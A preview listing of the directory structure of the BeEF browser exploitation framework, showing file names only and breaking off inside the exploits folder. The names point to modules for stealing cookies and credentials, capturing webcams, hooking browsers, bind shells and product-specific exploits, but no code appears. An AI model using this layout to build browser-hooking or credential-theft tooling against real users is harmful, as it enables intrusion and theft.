Showing preview only (6,592K chars total). Download the full file or copy to clipboard to get everything.
Repository: beefproject/beef
Branch: master
Commit: 7f20d03429ff
Files: 1592
Total size: 6.0 MB
Directory structure:
gitextract_7_kdzefs/
├── .dockerignore
├── .github/
│ ├── CONTRIBUTING.md
│ ├── ISSUE_TEMPLATE/
│ │ ├── bug_report.md
│ │ └── config.yml
│ ├── PULL_REQUEST_TEMPLATE.md
│ ├── SECURITY.md
│ ├── dependabot.yml
│ └── workflows/
│ ├── codeql.yml
│ ├── dependabot-auto-merge.yml
│ ├── dependabot_auto_label.yml
│ ├── github_actions.yml
│ └── stale.yml
├── .rspec
├── .rubocop.yml
├── .ruby-gemset
├── .ruby-version
├── Dockerfile
├── Gemfile
├── INSTALL.txt
├── README.md
├── Rakefile
├── VERSION
├── _config.yml
├── arerules/
│ ├── alert.json
│ ├── c_osx_test-return-mods.json
│ ├── confirm_close_tab.json
│ ├── enabled/
│ │ └── README
│ ├── ff_osx_extension-dropper.json
│ ├── get_cookie.json
│ ├── ie_win_fakenotification-clippy.json
│ ├── ie_win_htapowershell.json
│ ├── ie_win_missingflash-prettytheft.json
│ ├── ie_win_test-return-mods.json
│ ├── lan_cors_scan.json
│ ├── lan_cors_scan_common.json
│ ├── lan_fingerprint.json
│ ├── lan_fingerprint_common.json
│ ├── lan_flash_scan.json
│ ├── lan_flash_scan_common.json
│ ├── lan_http_scan.json
│ ├── lan_http_scan_common.json
│ ├── lan_ping_sweep.json
│ ├── lan_ping_sweep_common.json
│ ├── lan_port_scan.json
│ ├── lan_sw_port_scan.json
│ ├── man_in_the_browser.json
│ ├── raw_javascript.json
│ ├── record_snapshots.json
│ └── win_fake_malware.json
├── beef
├── beef_cert.pem
├── beef_key.pem
├── conf.json
├── config.yaml
├── core/
│ ├── api/
│ │ ├── extension.rb
│ │ ├── extensions.rb
│ │ ├── main/
│ │ │ ├── configuration.rb
│ │ │ ├── migration.rb
│ │ │ ├── network_stack/
│ │ │ │ └── assethandler.rb
│ │ │ ├── server/
│ │ │ │ └── hook.rb
│ │ │ └── server.rb
│ │ ├── module.rb
│ │ └── modules.rb
│ ├── api.rb
│ ├── bootstrap.rb
│ ├── core.rb
│ ├── extension.rb
│ ├── extensions.rb
│ ├── filters/
│ │ ├── base.rb
│ │ ├── browser.rb
│ │ ├── command.rb
│ │ ├── http.rb
│ │ └── page.rb
│ ├── filters.rb
│ ├── hbmanager.rb
│ ├── loader.rb
│ ├── logger.rb
│ ├── main/
│ │ ├── ar-migrations/
│ │ │ ├── 001_create_command_modules.rb
│ │ │ ├── 002_create_hooked_browsers.rb
│ │ │ ├── 003_create_logs.rb
│ │ │ ├── 004_create_commands.rb
│ │ │ ├── 005_create_results.rb
│ │ │ ├── 006_create_option_caches.rb
│ │ │ ├── 007_create_browser_details.rb
│ │ │ ├── 008_create_executions.rb
│ │ │ ├── 009_create_rules.rb
│ │ │ ├── 010_create_interceptor.rb
│ │ │ ├── 011_create_web_cloner.rb
│ │ │ ├── 013_create_network_host.rb
│ │ │ ├── 014_create_network_service.rb
│ │ │ ├── 015_create_http.rb
│ │ │ ├── 016_create_rtc_status.rb
│ │ │ ├── 017_create_rtc_manage.rb
│ │ │ ├── 018_create_rtc_signal.rb
│ │ │ ├── 019_create_rtc_module_status.rb
│ │ │ ├── 020_create_xssrays_detail.rb
│ │ │ ├── 021_create_dns_rule.rb
│ │ │ ├── 024_create_autoloader.rb
│ │ │ └── 025_create_xssrays_scan.rb
│ │ ├── autorun_engine/
│ │ │ ├── engine.rb
│ │ │ ├── parser.rb
│ │ │ └── rule_loader.rb
│ │ ├── client/
│ │ │ ├── are.js
│ │ │ ├── beef.js
│ │ │ ├── browser/
│ │ │ │ ├── cookie.js
│ │ │ │ └── popup.js
│ │ │ ├── browser.js
│ │ │ ├── dom.js
│ │ │ ├── encode/
│ │ │ │ ├── base64.js
│ │ │ │ └── json.js
│ │ │ ├── geolocation.js
│ │ │ ├── hardware.js
│ │ │ ├── init.js
│ │ │ ├── lib/
│ │ │ │ ├── evercookie.js
│ │ │ │ ├── jquery-migrate-1.4.1.js
│ │ │ │ ├── jquery.blockUI.js
│ │ │ │ ├── json2.js
│ │ │ │ ├── mdetect.js
│ │ │ │ ├── platform.js
│ │ │ │ └── webrtcadapter.js
│ │ │ ├── logger.js
│ │ │ ├── mitb.js
│ │ │ ├── net/
│ │ │ │ ├── connection.js
│ │ │ │ ├── cors.js
│ │ │ │ ├── dns.js
│ │ │ │ ├── local.js
│ │ │ │ ├── portscanner.js
│ │ │ │ ├── requester.js
│ │ │ │ └── xssrays.js
│ │ │ ├── net.js
│ │ │ ├── os.js
│ │ │ ├── session.js
│ │ │ ├── timeout.js
│ │ │ ├── updater.js
│ │ │ ├── webrtc.js
│ │ │ └── websocket.js
│ │ ├── command.rb
│ │ ├── configuration.rb
│ │ ├── console/
│ │ │ ├── banners.rb
│ │ │ ├── beef.ascii
│ │ │ └── commandline.rb
│ │ ├── constants/
│ │ │ ├── browsers.rb
│ │ │ ├── commandmodule.rb
│ │ │ ├── hardware.rb
│ │ │ └── os.rb
│ │ ├── crypto.rb
│ │ ├── geoip.rb
│ │ ├── handlers/
│ │ │ ├── browserdetails.rb
│ │ │ ├── commands.rb
│ │ │ ├── hookedbrowsers.rb
│ │ │ └── modules/
│ │ │ ├── beefjs.rb
│ │ │ ├── command.rb
│ │ │ ├── legacybeefjs.rb
│ │ │ └── multistagebeefjs.rb
│ │ ├── logger.rb
│ │ ├── migration.rb
│ │ ├── model.rb
│ │ ├── models/
│ │ │ ├── browserdetails.rb
│ │ │ ├── command.rb
│ │ │ ├── commandmodule.rb
│ │ │ ├── execution.rb
│ │ │ ├── hookedbrowser.rb
│ │ │ ├── legacybrowseruseragents.rb
│ │ │ ├── log.rb
│ │ │ ├── optioncache.rb
│ │ │ ├── result.rb
│ │ │ └── rule.rb
│ │ ├── network_stack/
│ │ │ ├── api.rb
│ │ │ ├── assethandler.rb
│ │ │ ├── handlers/
│ │ │ │ ├── dynamicreconstruction.rb
│ │ │ │ ├── raw.rb
│ │ │ │ └── redirector.rb
│ │ │ └── websocket/
│ │ │ └── websocket.rb
│ │ ├── rest/
│ │ │ ├── api.rb
│ │ │ └── handlers/
│ │ │ ├── admin.rb
│ │ │ ├── autorun_engine.rb
│ │ │ ├── browserdetails.rb
│ │ │ ├── categories.rb
│ │ │ ├── hookedbrowsers.rb
│ │ │ ├── logs.rb
│ │ │ ├── modules.rb
│ │ │ └── server.rb
│ │ ├── router/
│ │ │ ├── api.rb
│ │ │ └── router.rb
│ │ └── server.rb
│ ├── module.rb
│ ├── modules.rb
│ ├── ruby/
│ │ ├── hash.rb
│ │ ├── module.rb
│ │ ├── print.rb
│ │ ├── security.rb
│ │ └── string.rb
│ ├── ruby.rb
│ └── settings.rb
├── doc/
│ ├── COPYING
│ └── boilerplate
├── docs/
│ ├── BeefJS.html
│ ├── are.js.html
│ ├── beef.are.html
│ ├── beef.browser.cookie.html
│ ├── beef.browser.html
│ ├── beef.browser.popup.html
│ ├── beef.dom.html
│ ├── beef.encode.base64.html
│ ├── beef.encode.json.html
│ ├── beef.geolocation.html
│ ├── beef.hardware.html
│ ├── beef.init.html
│ ├── beef.js.html
│ ├── beef.logger.html
│ ├── beef.mitb.html
│ ├── beef.net.connection.html
│ ├── beef.net.cors.html
│ ├── beef.net.dns.html
│ ├── beef.net.html
│ ├── beef.net.local.html
│ ├── beef.net.portscanner.html
│ ├── beef.net.requester.html
│ ├── beef.net.xssrays.html
│ ├── beef.os.html
│ ├── beef.session.html
│ ├── beef.timeout.html
│ ├── beef.updater.html
│ ├── beef.webrtc.html
│ ├── beef.websocket.html
│ ├── browser.js.html
│ ├── browser_cookie.js.html
│ ├── browser_jools.html
│ ├── browser_popup.js.html
│ ├── dom.js.html
│ ├── encode_base64.js.html
│ ├── encode_json.js.html
│ ├── geolocation.js.html
│ ├── global.html
│ ├── hardware.js.html
│ ├── index.html
│ ├── init.js.html
│ ├── lib_browser_jools.js.html
│ ├── lib_deployJava.js.html
│ ├── lib_platform.js.html
│ ├── logger.js.html
│ ├── mitb.js.html
│ ├── net.js.html
│ ├── net_connection.js.html
│ ├── net_cors.js.html
│ ├── net_dns.js.html
│ ├── net_local.js.html
│ ├── net_portscanner.js.html
│ ├── net_requester.js.html
│ ├── net_xssrays.js.html
│ ├── os.js.html
│ ├── platform.html
│ ├── scripts/
│ │ ├── linenumber.js
│ │ └── prettify/
│ │ ├── Apache-License-2.0.txt
│ │ ├── lang-css.js
│ │ └── prettify.js
│ ├── session.js.html
│ ├── styles/
│ │ ├── jsdoc-default.css
│ │ ├── prettify-jsdoc.css
│ │ └── prettify-tomorrow.css
│ ├── timeout.js.html
│ ├── updater.js.html
│ ├── webrtc.js.html
│ └── websocket.js.html
├── extensions/
│ ├── admin_ui/
│ │ ├── api/
│ │ │ └── handler.rb
│ │ ├── classes/
│ │ │ ├── httpcontroller.rb
│ │ │ └── session.rb
│ │ ├── config.yaml
│ │ ├── constants/
│ │ │ └── icons.rb
│ │ ├── controllers/
│ │ │ ├── authentication/
│ │ │ │ ├── authentication.rb
│ │ │ │ └── index.html
│ │ │ ├── modules/
│ │ │ │ └── modules.rb
│ │ │ └── panel/
│ │ │ ├── index.html
│ │ │ └── panel.rb
│ │ ├── extension.rb
│ │ ├── handlers/
│ │ │ └── ui.rb
│ │ └── media/
│ │ ├── css/
│ │ │ ├── base.css
│ │ │ └── ext-all.css
│ │ ├── images/
│ │ │ ├── default/
│ │ │ │ ├── form/
│ │ │ │ │ ├── clear-trigger.psd
│ │ │ │ │ ├── date-trigger.psd
│ │ │ │ │ ├── search-trigger.psd
│ │ │ │ │ └── trigger.psd
│ │ │ │ └── window/
│ │ │ │ ├── left-corners.psd
│ │ │ │ ├── left-right.psd
│ │ │ │ ├── right-corners.psd
│ │ │ │ └── top-bottom.psd
│ │ │ └── icons/
│ │ │ └── README
│ │ └── javascript/
│ │ ├── esapi/
│ │ │ ├── Class.create.js
│ │ │ └── jquery-encoder-0.1.0.js
│ │ ├── ext-all.js
│ │ ├── ext-base.js
│ │ ├── ui/
│ │ │ ├── authentication.js
│ │ │ ├── common/
│ │ │ │ └── beef_common.js
│ │ │ └── panel/
│ │ │ ├── AutoRunModuleForm.js
│ │ │ ├── AutoRunRuleForm.js
│ │ │ ├── AutoRunTab.js
│ │ │ ├── BrowserDetailsDataGrid.js
│ │ │ ├── HooksTab.js
│ │ │ ├── Logout.js
│ │ │ ├── LogsDataGrid.js
│ │ │ ├── MainPanel.js
│ │ │ ├── ModuleSearching.js
│ │ │ ├── PanelStatusBar.js
│ │ │ ├── PanelViewer.js
│ │ │ ├── WelcomeTab.js
│ │ │ ├── ZombieDataGrid.js
│ │ │ ├── ZombieTab.js
│ │ │ ├── ZombieTabs.js
│ │ │ ├── ZombiesMgr.js
│ │ │ ├── common.js
│ │ │ ├── tabs/
│ │ │ │ ├── ZombieTabCommands.js
│ │ │ │ ├── ZombieTabDetails.js
│ │ │ │ ├── ZombieTabLogs.js
│ │ │ │ ├── ZombieTabNetwork.js
│ │ │ │ ├── ZombieTabRTC.js
│ │ │ │ ├── ZombieTabRider.js
│ │ │ │ └── ZombieTabXssRays.js
│ │ │ └── zombiesTreeList.js
│ │ └── ux/
│ │ ├── PagingStore.js
│ │ ├── StatusBar.js
│ │ └── TabCloseMenu.js
│ ├── autoloader/
│ │ ├── config.yaml
│ │ ├── extension.rb
│ │ └── model.rb
│ ├── customhook/
│ │ ├── api.rb
│ │ ├── config.yaml
│ │ ├── extension.rb
│ │ ├── handler.rb
│ │ └── html/
│ │ └── index.html
│ ├── demos/
│ │ ├── api.rb
│ │ ├── config.yaml
│ │ ├── extension.rb
│ │ ├── handler.rb
│ │ └── html/
│ │ ├── basic.html
│ │ ├── butcher/
│ │ │ ├── butch.css
│ │ │ └── index.html
│ │ ├── clickjacking/
│ │ │ ├── clickjack_attack.html
│ │ │ └── clickjack_victim.html
│ │ ├── plain.html
│ │ ├── report.html
│ │ └── secret_page.html
│ ├── dns/
│ │ ├── api.rb
│ │ ├── config.yaml
│ │ ├── dns.rb
│ │ ├── extension.rb
│ │ ├── logger.rb
│ │ ├── model.rb
│ │ └── rest/
│ │ └── dns.rb
│ ├── dns_rebinding/
│ │ ├── api.rb
│ │ ├── config.yaml
│ │ ├── dns_rebinding.rb
│ │ ├── extension.rb
│ │ └── views/
│ │ └── index.html
│ ├── etag/
│ │ ├── api.rb
│ │ ├── config.yaml
│ │ ├── etag.rb
│ │ └── extension.rb
│ ├── evasion/
│ │ ├── config.yaml
│ │ ├── evasion.rb
│ │ ├── extension.rb
│ │ └── obfuscation/
│ │ ├── base_64.rb
│ │ ├── minify.rb
│ │ ├── scramble.rb
│ │ └── whitespace.rb
│ ├── events/
│ │ ├── api.rb
│ │ ├── config.yaml
│ │ ├── extension.rb
│ │ └── handler.rb
│ ├── metasploit/
│ │ ├── api.rb
│ │ ├── config.yaml
│ │ ├── extension.rb
│ │ ├── module.rb
│ │ ├── rest/
│ │ │ └── msf.rb
│ │ └── rpcclient.rb
│ ├── network/
│ │ ├── api.rb
│ │ ├── config.yaml
│ │ ├── extension.rb
│ │ ├── models/
│ │ │ ├── network_host.rb
│ │ │ └── network_service.rb
│ │ └── rest/
│ │ └── network.rb
│ ├── notifications/
│ │ ├── channels/
│ │ │ ├── email.rb
│ │ │ ├── ntfy.rb
│ │ │ ├── pushover.rb
│ │ │ └── slack_workspace.rb
│ │ ├── config.yaml
│ │ ├── extension.rb
│ │ └── notifications.rb
│ ├── proxy/
│ │ ├── api.rb
│ │ ├── config.yaml
│ │ ├── extension.rb
│ │ ├── proxy.rb
│ │ └── rest/
│ │ └── proxy.rb
│ ├── qrcode/
│ │ ├── config.yaml
│ │ ├── extension.rb
│ │ └── qrcode.rb
│ ├── requester/
│ │ ├── api/
│ │ │ └── hook.rb
│ │ ├── api.rb
│ │ ├── config.yaml
│ │ ├── extension.rb
│ │ ├── handler.rb
│ │ ├── models/
│ │ │ └── http.rb
│ │ └── rest/
│ │ └── requester.rb
│ ├── s2c_dns_tunnel/
│ │ ├── api.rb
│ │ ├── config.yaml
│ │ ├── dnsd.rb
│ │ ├── extension.rb
│ │ └── httpd.rb
│ ├── social_engineering/
│ │ ├── config.yaml
│ │ ├── droppers/
│ │ │ └── readme.txt
│ │ ├── extension.rb
│ │ ├── models/
│ │ │ ├── interceptor.rb
│ │ │ └── web_cloner.rb
│ │ ├── powershell/
│ │ │ └── bind_powershell.rb
│ │ ├── rest/
│ │ │ └── socialengineering.rb
│ │ └── web_cloner/
│ │ ├── cloned_pages/
│ │ │ └── readme.txt
│ │ ├── interceptor.rb
│ │ └── web_cloner.rb
│ ├── webrtc/
│ │ ├── api/
│ │ │ └── hook.rb
│ │ ├── api.rb
│ │ ├── config.yaml
│ │ ├── extension.rb
│ │ ├── handlers.rb
│ │ ├── models/
│ │ │ ├── rtcmanage.rb
│ │ │ ├── rtcmodulestatus.rb
│ │ │ ├── rtcsignal.rb
│ │ │ └── rtcstatus.rb
│ │ └── rest/
│ │ └── webrtc.rb
│ └── xssrays/
│ ├── api/
│ │ └── scan.rb
│ ├── api.rb
│ ├── config.yaml
│ ├── extension.rb
│ ├── handler.rb
│ ├── models/
│ │ ├── xssraysdetail.rb
│ │ └── xssraysscan.rb
│ └── rest/
│ └── xssrays.rb
├── googlef1d5ff5151333109.html
├── install
├── modules/
│ ├── browser/
│ │ ├── avant_steal_history/
│ │ │ ├── command.js
│ │ │ ├── config.yaml
│ │ │ └── module.rb
│ │ ├── browser_fingerprinting/
│ │ │ ├── command.js
│ │ │ ├── config.yaml
│ │ │ └── module.rb
│ │ ├── detect_activex/
│ │ │ ├── command.js
│ │ │ ├── config.yaml
│ │ │ └── module.rb
│ │ ├── detect_evernote_clipper/
│ │ │ ├── command.js
│ │ │ ├── config.yaml
│ │ │ └── module.rb
│ │ ├── detect_extensions/
│ │ │ ├── command.js
│ │ │ ├── config.yaml
│ │ │ └── module.rb
│ │ ├── detect_firebug/
│ │ │ ├── command.js
│ │ │ ├── config.yaml
│ │ │ └── module.rb
│ │ ├── detect_foxit/
│ │ │ ├── command.js
│ │ │ ├── config.yaml
│ │ │ └── module.rb
│ │ ├── detect_lastpass/
│ │ │ ├── command.js
│ │ │ ├── config.yaml
│ │ │ └── module.rb
│ │ ├── detect_mime_types/
│ │ │ ├── command.js
│ │ │ ├── config.yaml
│ │ │ └── module.rb
│ │ ├── detect_office/
│ │ │ ├── command.js
│ │ │ ├── config.yaml
│ │ │ └── module.rb
│ │ ├── detect_popup_blocker/
│ │ │ ├── command.js
│ │ │ ├── config.yaml
│ │ │ └── module.rb
│ │ ├── detect_quicktime/
│ │ │ ├── command.js
│ │ │ ├── config.yaml
│ │ │ └── module.rb
│ │ ├── detect_realplayer/
│ │ │ ├── command.js
│ │ │ ├── config.yaml
│ │ │ └── module.rb
│ │ ├── detect_silverlight/
│ │ │ ├── command.js
│ │ │ ├── config.yaml
│ │ │ └── module.rb
│ │ ├── detect_simple_adblock/
│ │ │ ├── command.js
│ │ │ ├── config.yaml
│ │ │ └── module.rb
│ │ ├── detect_toolbars/
│ │ │ ├── command.js
│ │ │ ├── config.yaml
│ │ │ └── module.rb
│ │ ├── detect_unity/
│ │ │ ├── command.js
│ │ │ ├── config.yaml
│ │ │ └── module.rb
│ │ ├── detect_unsafe_activex/
│ │ │ ├── command.js
│ │ │ ├── config.yaml
│ │ │ └── module.rb
│ │ ├── detect_vlc/
│ │ │ ├── command.js
│ │ │ ├── config.yaml
│ │ │ └── module.rb
│ │ ├── detect_wmp/
│ │ │ ├── command.js
│ │ │ ├── config.yaml
│ │ │ └── module.rb
│ │ ├── fingerprint_browser/
│ │ │ ├── command.js
│ │ │ ├── config.yaml
│ │ │ ├── fingerprint2.js
│ │ │ └── module.rb
│ │ ├── get_visited_domains/
│ │ │ ├── command.js
│ │ │ ├── config.yaml
│ │ │ └── module.rb
│ │ ├── get_visited_urls/
│ │ │ ├── command.js
│ │ │ ├── config.yaml
│ │ │ └── module.rb
│ │ ├── hooked_origin/
│ │ │ ├── ajax_fingerprint/
│ │ │ │ ├── command.js
│ │ │ │ ├── config.yaml
│ │ │ │ └── module.rb
│ │ │ ├── alert_dialog/
│ │ │ │ ├── command.js
│ │ │ │ ├── config.yaml
│ │ │ │ └── module.rb
│ │ │ ├── apache_tomcat_examples_cookie_disclosure/
│ │ │ │ ├── command.js
│ │ │ │ ├── config.yaml
│ │ │ │ └── module.rb
│ │ │ ├── cisco_asa_password_disclosure/
│ │ │ │ ├── command.js
│ │ │ │ ├── config.yaml
│ │ │ │ └── module.rb
│ │ │ ├── clear_console/
│ │ │ │ ├── command.js
│ │ │ │ ├── config.yaml
│ │ │ │ └── module.rb
│ │ │ ├── deface_web_page/
│ │ │ │ ├── command.js
│ │ │ │ ├── config.yaml
│ │ │ │ └── module.rb
│ │ │ ├── deface_web_page_component/
│ │ │ │ ├── command.js
│ │ │ │ ├── config.yaml
│ │ │ │ └── module.rb
│ │ │ ├── disable_developer_tools/
│ │ │ │ ├── command.js
│ │ │ │ ├── config.yaml
│ │ │ │ └── module.rb
│ │ │ ├── get_autocomplete_creds/
│ │ │ │ ├── command.js
│ │ │ │ ├── config.yaml
│ │ │ │ └── module.rb
│ │ │ ├── get_cookie/
│ │ │ │ ├── command.js
│ │ │ │ ├── config.yaml
│ │ │ │ └── module.rb
│ │ │ ├── get_form_values/
│ │ │ │ ├── command.js
│ │ │ │ ├── config.yaml
│ │ │ │ └── module.rb
│ │ │ ├── get_local_storage/
│ │ │ │ ├── command.js
│ │ │ │ ├── config.yaml
│ │ │ │ └── module.rb
│ │ │ ├── get_page_html/
│ │ │ │ ├── command.js
│ │ │ │ ├── config.yaml
│ │ │ │ └── module.rb
│ │ │ ├── get_page_html_iframe/
│ │ │ │ ├── command.js
│ │ │ │ ├── config.yaml
│ │ │ │ └── module.rb
│ │ │ ├── get_page_links/
│ │ │ │ ├── command.js
│ │ │ │ ├── config.yaml
│ │ │ │ └── module.rb
│ │ │ ├── get_session_storage/
│ │ │ │ ├── command.js
│ │ │ │ ├── config.yaml
│ │ │ │ └── module.rb
│ │ │ ├── get_stored_credentials/
│ │ │ │ ├── command.js
│ │ │ │ ├── config.yaml
│ │ │ │ └── module.rb
│ │ │ ├── link_rewrite/
│ │ │ │ ├── command.js
│ │ │ │ ├── config.yaml
│ │ │ │ └── module.rb
│ │ │ ├── link_rewrite_click_events/
│ │ │ │ ├── command.js
│ │ │ │ ├── config.yaml
│ │ │ │ └── module.rb
│ │ │ ├── link_rewrite_sslstrip/
│ │ │ │ ├── command.js
│ │ │ │ ├── config.yaml
│ │ │ │ └── module.rb
│ │ │ ├── link_rewrite_tel/
│ │ │ │ ├── command.js
│ │ │ │ ├── config.yaml
│ │ │ │ └── module.rb
│ │ │ ├── mobilesafari_address_spoofing/
│ │ │ │ ├── command.js
│ │ │ │ ├── config.yaml
│ │ │ │ └── module.rb
│ │ │ ├── overflow_cookiejar/
│ │ │ │ ├── command.js
│ │ │ │ ├── config.yaml
│ │ │ │ └── module.rb
│ │ │ ├── prompt_dialog/
│ │ │ │ ├── command.js
│ │ │ │ ├── config.yaml
│ │ │ │ └── module.rb
│ │ │ ├── remove_stuck_iframes/
│ │ │ │ ├── command.js
│ │ │ │ ├── config.yaml
│ │ │ │ └── module.rb
│ │ │ ├── replace_video/
│ │ │ │ ├── command.js
│ │ │ │ ├── config.yaml
│ │ │ │ └── module.rb
│ │ │ ├── rickroll/
│ │ │ │ ├── command.js
│ │ │ │ ├── config.yaml
│ │ │ │ └── module.rb
│ │ │ ├── site_redirect/
│ │ │ │ ├── command.js
│ │ │ │ ├── config.yaml
│ │ │ │ └── module.rb
│ │ │ └── site_redirect_iframe/
│ │ │ ├── command.js
│ │ │ ├── config.yaml
│ │ │ └── module.rb
│ │ ├── play_sound/
│ │ │ ├── command.js
│ │ │ ├── config.yaml
│ │ │ └── module.rb
│ │ ├── remove_hook_element/
│ │ │ ├── command.js
│ │ │ ├── config.yaml
│ │ │ └── module.rb
│ │ ├── spyder_eye/
│ │ │ ├── command.js
│ │ │ ├── config.yaml
│ │ │ └── module.rb
│ │ ├── unhook/
│ │ │ ├── command.js
│ │ │ ├── config.yaml
│ │ │ └── module.rb
│ │ ├── webcam_flash/
│ │ │ ├── command.js
│ │ │ ├── config.yaml
│ │ │ ├── dev/
│ │ │ │ ├── com/
│ │ │ │ │ ├── adobe/
│ │ │ │ │ │ └── images/
│ │ │ │ │ │ ├── BitString.as
│ │ │ │ │ │ ├── JPGEncoder.as
│ │ │ │ │ │ └── PNGEncoder.as
│ │ │ │ │ └── foxarc/
│ │ │ │ │ └── util/
│ │ │ │ │ └── Base64.as
│ │ │ │ └── takeit.fla
│ │ │ ├── module.rb
│ │ │ ├── swfobject.js
│ │ │ └── takeit.swf
│ │ ├── webcam_html5/
│ │ │ ├── command.js
│ │ │ ├── config.yaml
│ │ │ └── module.rb
│ │ └── webcam_permission_check/
│ │ ├── cameraCheck.as
│ │ ├── cameraCheck.swf
│ │ ├── command.js
│ │ ├── config.yaml
│ │ ├── module.rb
│ │ └── swfobject.js
│ ├── chrome_extensions/
│ │ ├── execute_tabs/
│ │ │ ├── command.js
│ │ │ ├── config.yaml
│ │ │ └── module.rb
│ │ ├── get_all_cookies/
│ │ │ ├── command.js
│ │ │ ├── config.yaml
│ │ │ └── module.rb
│ │ ├── grab_google_contacts/
│ │ │ ├── command.js
│ │ │ ├── config.yaml
│ │ │ └── module.rb
│ │ ├── inject_beef/
│ │ │ ├── command.js
│ │ │ ├── config.yaml
│ │ │ └── module.rb
│ │ ├── screenshot/
│ │ │ ├── command.js
│ │ │ ├── config.yaml
│ │ │ └── module.rb
│ │ └── send_gvoice_sms/
│ │ ├── command.js
│ │ ├── config.yaml
│ │ └── module.rb
│ ├── debug/
│ │ ├── test_beef_debug/
│ │ │ ├── command.js
│ │ │ ├── config.yaml
│ │ │ └── module.rb
│ │ ├── test_cors_request/
│ │ │ ├── command.js
│ │ │ ├── config.yaml
│ │ │ └── module.rb
│ │ ├── test_dns_tunnel_client/
│ │ │ ├── command.js
│ │ │ ├── config.yaml
│ │ │ └── module.rb
│ │ ├── test_get_variable/
│ │ │ ├── command.js
│ │ │ ├── config.yaml
│ │ │ └── module.rb
│ │ ├── test_http_redirect/
│ │ │ ├── command.js
│ │ │ ├── config.yaml
│ │ │ └── module.rb
│ │ ├── test_network_request/
│ │ │ ├── command.js
│ │ │ ├── config.yaml
│ │ │ └── module.rb
│ │ ├── test_return_ascii_chars/
│ │ │ ├── command.js
│ │ │ ├── config.yaml
│ │ │ └── module.rb
│ │ ├── test_return_image/
│ │ │ ├── command.js
│ │ │ ├── config.yaml
│ │ │ └── module.rb
│ │ └── test_return_long_string/
│ │ ├── command.js
│ │ ├── config.yaml
│ │ └── module.rb
│ ├── exploits/
│ │ ├── apache_cookie_disclosure/
│ │ │ ├── command.js
│ │ │ ├── config.yaml
│ │ │ └── module.rb
│ │ ├── apache_felix_remote_shell/
│ │ │ ├── command.js
│ │ │ ├── config.yaml
│ │ │ └── module.rb
│ │ ├── beefbind/
│ │ │ ├── beef_bind_shell/
│ │ │ │ ├── command.js
│ │ │ │ ├── config.yaml
│ │ │ │ └── module.rb
│ │ │ └── shellcode_sources/
│ │ │ ├── linux/
│ │ │ │ ├── x64/
│ │ │ │ │ ├── socket64.c
│ │ │ │ │ ├── stage64.nasm
│ │ │ │ │ └── stager64.nasm
│ │ │ │ └── x86/
│ │ │ │ ├── socket.c
│ │ │ │ ├── stage.nasm
│ │ │ │ └── stager.nasm
│ │ │ ├── msf/
│ │ │ │ ├── README.md
│ │ │ │ ├── beef_bind-handler.rb
│ │ │ │ ├── beef_bind-stage-linux-x64.rb
│ │ │ │ ├── beef_bind-stage-linux-x86.rb
│ │ │ │ ├── beef_bind-stage-windows-x86.rb
│ │ │ │ ├── beef_bind-stager-linux-x64.rb
│ │ │ │ ├── beef_bind-stager-linux-x86.rb
│ │ │ │ └── beef_bind-stager-windows-x86.rb
│ │ │ └── windows/
│ │ │ ├── beef_bind_tcp-stage.asm
│ │ │ ├── beef_bind_tcp-stager.asm
│ │ │ ├── socket.c
│ │ │ └── src/
│ │ │ ├── block_api.asm
│ │ │ ├── block_beef_bind-stage.asm
│ │ │ ├── block_beef_bind-stager.asm
│ │ │ ├── block_bind_tcp.asm
│ │ │ ├── block_pipes.asm
│ │ │ ├── block_shell_pipes.asm
│ │ │ ├── block_sleep.asm
│ │ │ └── block_virtualalloc.asm
│ │ ├── boastmachine_3_1_add_user_csrf/
│ │ │ ├── command.js
│ │ │ ├── config.yaml
│ │ │ └── module.rb
│ │ ├── camera/
│ │ │ ├── airlive_ip_camera_csrf/
│ │ │ │ ├── command.js
│ │ │ │ ├── config.yaml
│ │ │ │ └── module.rb
│ │ │ ├── dlink_dcs_series_csrf/
│ │ │ │ ├── command.js
│ │ │ │ ├── config.yaml
│ │ │ │ └── module.rb
│ │ │ └── linksys_wvc_wireless_camera_csrf/
│ │ │ ├── command.js
│ │ │ ├── config.yaml
│ │ │ └── module.rb
│ │ ├── coldfusion_dir_traversal_exploit/
│ │ │ ├── command.js
│ │ │ ├── config.yaml
│ │ │ └── module.rb
│ │ ├── extract_cmd_exec/
│ │ │ ├── command.js
│ │ │ ├── config.yaml
│ │ │ └── module.rb
│ │ ├── farsite_x25_remote_shell/
│ │ │ ├── command.js
│ │ │ ├── config.yaml
│ │ │ └── module.rb
│ │ ├── firephp/
│ │ │ ├── command.js
│ │ │ ├── config.yaml
│ │ │ ├── module.rb
│ │ │ └── payload.js
│ │ ├── glassfish_war_upload_xsrf/
│ │ │ ├── command.js
│ │ │ ├── config.yaml
│ │ │ └── module.rb
│ │ ├── groovyshell_server_cmd_exec/
│ │ │ ├── command.js
│ │ │ ├── config.yaml
│ │ │ └── module.rb
│ │ ├── hp_ucmdb_add_user_csrf/
│ │ │ ├── command.js
│ │ │ ├── config.yaml
│ │ │ └── module.rb
│ │ ├── jboss_jmx_upload_exploit/
│ │ │ ├── command.js
│ │ │ ├── config.yaml
│ │ │ └── module.rb
│ │ ├── jenkins_groovy_code_exec/
│ │ │ ├── command.js
│ │ │ ├── config.yaml
│ │ │ └── module.rb
│ │ ├── kemp_command_execution/
│ │ │ ├── command.js
│ │ │ ├── config.yaml
│ │ │ └── module.rb
│ │ ├── local_host/
│ │ │ ├── activex_command_execution/
│ │ │ │ ├── command.js
│ │ │ │ ├── config.yaml
│ │ │ │ └── module.rb
│ │ │ ├── java_payload/
│ │ │ │ ├── Applet_ReverseTCP.jar
│ │ │ │ ├── README.txt
│ │ │ │ ├── command.js
│ │ │ │ ├── config.yaml
│ │ │ │ └── module.rb
│ │ │ ├── mozilla_nsiprocess_interface/
│ │ │ │ ├── command.js
│ │ │ │ ├── config.yaml
│ │ │ │ └── module.rb
│ │ │ ├── safari_launch_app/
│ │ │ │ ├── command.js
│ │ │ │ ├── config.yaml
│ │ │ │ └── module.rb
│ │ │ ├── signed_applet_dropper/
│ │ │ │ ├── README.txt
│ │ │ │ ├── applet/
│ │ │ │ │ ├── SM.java
│ │ │ │ │ ├── SignedApplet.jar
│ │ │ │ │ └── SignedApplet.java
│ │ │ │ ├── command.js
│ │ │ │ ├── config.yaml
│ │ │ │ └── module.rb
│ │ │ └── window_mail_client_dos/
│ │ │ ├── command.js
│ │ │ ├── config.yaml
│ │ │ └── module.rb
│ │ ├── nas/
│ │ │ ├── dlink_sharecenter_cmd_exec/
│ │ │ │ ├── command.js
│ │ │ │ ├── config.yaml
│ │ │ │ └── module.rb
